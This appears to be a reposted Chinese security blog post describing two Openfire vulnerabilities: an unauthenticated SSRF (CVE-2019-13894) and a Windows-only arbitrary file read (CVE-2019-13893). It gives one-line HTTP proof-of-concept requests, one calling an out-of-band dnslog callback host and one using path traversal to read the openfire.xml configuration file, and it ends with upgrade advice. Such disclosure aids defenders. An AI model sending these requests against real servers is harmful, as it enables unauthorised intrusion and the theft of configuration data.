Openfire 未授权SSRF漏洞&任意文件读取

admin 2020年8月10日18:18:38评论2,274 views字数 692阅读2分18秒阅读模式


Openfire 未授权SSRF漏洞&任意文件读取


0x01 简介

Openfire(以前称为Wildfire和Jive Messenger)是IgniteRealtime支持的Jabber服务器。它是一个跨平台的Java应用程序,将其自身定位为中型企业控制内部通信并简化即时消息传递的平台。


0x02 SSRF CVE-2019-13894

漏洞允许未经身份验证的攻击者向内部网络发送任意HTTP GET请求,并从目标Web服务获取完整的输出。

PoC:

GET /getFavicon?host=jd7uyj.dnslog.cn HTTP/1.1

Openfire 未授权SSRF漏洞&任意文件读取

Openfire 未授权SSRF漏洞&任意文件读取

推荐两个在线测试监控平台

http://ceye.io/http://www.dnslog.cn/


0x03 CVE-2019-13893 任意文件读取

漏洞只影响windows下安装openfire的用户。

PoC:

GET /plugins/search/......confopenfire.xml HTTP/1.1Host: localhost:9090Cookie: JSESSIONID=node01aaib5x4g4p781q3i2m2tm74u91.node0;

Openfire 未授权SSRF漏洞&任意文件读取

(此漏洞小编没有搭建环境,只复现了SSRF,图片来源于某大佬)


0x04 修复建议

如果您有Openfire服务器,请确保已将其更新到4.4.3或更高版本。


0x05 参考链接


https://www.seebug.org/vuldb/ssvid-98328https://swarm.ptsecurity.com/openfire-admin-console/https://www.cnblogs.com/potatsoSec/p/13437713.html


Openfire 未授权SSRF漏洞&任意文件读取

Openfire 未授权SSRF漏洞&任意文件读取



  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年8月10日18:18:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Openfire 未授权SSRF漏洞&任意文件读取http://cn-sec.com/archives/83380.html

发表评论

匿名网友 填写信息